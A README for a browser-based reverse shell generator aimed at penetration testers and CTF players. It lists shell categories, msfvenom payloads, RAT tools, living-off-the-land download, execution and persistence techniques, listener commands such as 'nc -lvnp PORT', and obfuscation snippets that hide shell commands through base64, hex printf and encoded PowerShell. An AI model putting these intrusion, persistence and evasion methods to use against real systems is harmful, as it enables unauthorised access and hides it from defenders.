Self-contained reverse shell generator Β· zero dependencies Β· single HTML file
For authorised penetration testing and CTF use only
RaccShells is a self-contained, single-file reverse shell reference tool. Open index.html β no server, no install, no internet required. Enter your IP and port, copy the shell, and go.
Built with a dark terminal aesthetic: scanline overlay, matrix green, monospace everything.
| Tab | Contents |
|---|---|
| Reverse Shells | 72 shells across Bash, Python, Perl, PHP, Ruby, PowerShell, Java, Go, Lua, Awk, β¦ |
| Bind Shells | 14 bind-side listeners |
| MSFVenom | 25 ready-to-paste msfvenom payloads |
| Shell Upgrade | TTY spawn, stty raw, socat fully interactive, escape binaries |
| Tools & Listeners | pwncat-cs, pwncat (cytopia), Chashell, HellShell, SSL-AES, FuegoShell, CHAOS RAT, tmate |
| Living off the Land | Windows (LOLBAS) + Linux + macOS β download, exec, persistence, tunnel |
Every shell shows an animated SVG diagram when expanded β no static images, generated inline.
flowchart LR
subgraph VICTIM
V["π» :random"]
end
subgraph ATTACKER
A["π₯ :4444 LISTEN"]
end
V -- "β TCP connect-back" --> A
A -. "β‘ commands" .-> V
V -. "β’ output" .-> A
flowchart LR
subgraph ATTACKER
A["π₯ connects"]
end
subgraph VICTIM
V["π» :4444 LISTEN"]
end
A -- "β connect to port" --> V
A -. "β‘ commands" .-> V
V -. "β’ output" .-> A
flowchart LR
subgraph VICTIM
V["π» DNS client"]
end
subgraph DNS["DNS Nameserver\nyour domain NS"]
D[" "]
end
subgraph ATTACKER
A["π₯ NS record"]
end
V -- "β DNS query\n(XSalsa20 enc)" --> D
D -- "NS forward" --> A
A -. "β‘ encoded response" .-> D
D -. "NS reply" .-> V
flowchart LR
subgraph VICTIM
V["π» polling"]
end
subgraph ATTACKER
A["π₯ HTTP :80"]
end
V -- "β GET /token\npoll for cmd" --> A
A -. "β‘ 200 encoded cmd" .-> V
V -- "β’ POST /token\nencoded output" --> A
flowchart LR
subgraph VICTIM
V["π» :random"]
end
subgraph ATTACKER
A["π₯ :443 LISTEN"]
end
V -- "β TLS handshake" --> A
A -- "β‘ π encrypted cmd" --> V
V -- "β’ π encrypted output" --> A
style A fill:#1a1200,stroke:#cc9900
style V fill:#1a0000,stroke:#ff4444
Each shell that contains an interpreter supports dynamic obfuscation β click βΆ obf to cycle modes without leaving the page.
stateDiagram-v2
[*] --> plain
plain --> base64 : click obf
base64 --> var_split : click obf
var_split --> hex_printf : click obf
hex_printf --> plain : click obf
state "bash base64" as base64
note right of base64
bash -c "$(echo '...'|base64 -d)"
end note
state "$var split" as var_split
note right of var_split
b='ba';s='sh'; eval $b$s${IFS}-i...
end note
state "hex printf" as hex_printf
note right of hex_printf
eval "$(printf '\x62\x61\x73\x68...')"
end note
Obfuscation modes per interpreter:
| Interpreter | Modes |
|---|---|
| Bash / Zsh / Sh | base64 Β· $var split Β· hex printf |
| PowerShell | -EncodedCommand (UTF-16LE) Β· [char[]] IEX |
| Python | exec(base64.b64decode(...)) |
| Perl | eval(pack('H*', hex)) |
| PHP | eval(base64_decode(...)) |
| Ruby | eval(Base64.decode64(...)) |
Shells with encrypted transport are highlighted in gold and carry a π badge.
flowchart TD
subgraph Encrypted["π Encrypted Transport"]
direction LR
E1["OpenSSL s_client"]
E2["PowerShell TLS #4"]
E3["Ncat --ssl"]
E4["HoaxShell HTTPS"]
E5["SSL-AES C++ Shell"]
E6["Chashell DNS (XSalsa20)"]
end
Use the π encrypted filter chip to show only these shells.
Techniques organised by OS, each with its own filter view.
mindmap
root((LotL))
Windows
Download & Execute
certutil
bitsadmin
curl Win10+
PowerShell cradle
Code Execution
mshta HTA
regsvr32 Squiblydoo
rundll32 JS
MSBuild C#
InstallUtil
wmic
Persistence
Registry Run key
Scheduled Task
Startup folder
Linux
Download & Execute
curl pipe bash
wget pipe bash
python3 fetch
File Transfer
nc / socat
dd raw
base64 paste
Tunneling
SSH reverse tunnel
SSH SOCKS5
Chisel
Persistence
crontab
systemd user service
LD_PRELOAD
macOS
Download & Execute
curl pipe bash
osascript
Persistence
LaunchAgent plist
crontab
| Tool | Type | Platform |
|---|---|---|
| pwncat-cs | Post-exploitation platform | Linux |
| pwncat (cytopia) | Netcat on steroids | Linux / Mac / Win |
| Chashell | DNS reverse shell | All |
| HellShell | Shellcode obfuscator | Windows |
| SSL-AES Reverse Shell | TLS C++ shell | Windows |
| FuegoShell | SMB named-pipe shell | Windows |
| CHAOS RAT | Go RAT with web UI | Linux / Win |
| tmate | Terminal sharing via SSH | Linux / Mac |
# Option 1 β open directly in browser (no server needed)
open index.html # macOS
start index.html # Windows
xdg-open index.html # Linux
# Option 2 β serve locally
python3 -m http.server 8080
# β http://localhost:8080- Set LHOST / IP, PORT, and preferred shell binary
- Pick a listener from the dropdown β the attacker-side command auto-updates
- Use the filter chips to narrow by OS, encryption, or obfuscation support
- Click a shell to expand β diagram animates, copy button is ready
- Optionally click βΆ obf to cycle through obfuscation modes before copying
flowchart LR
L["Listener Dropdown"] --> NC["nc -lvnp PORT"]
L --> NCAT["ncat -lvnp PORT"]
L --> SOCAT["socat file:tty,raw TCP-LISTEN:PORT"]
L --> RLWRAP["rlwrap nc -lvnp PORT (TTY)"]
L --> MSF["msf multi/handler"]
L --> PCS["pwncat-cs -lp PORT"]
L --> PCY["pwncat -l -p PORT"]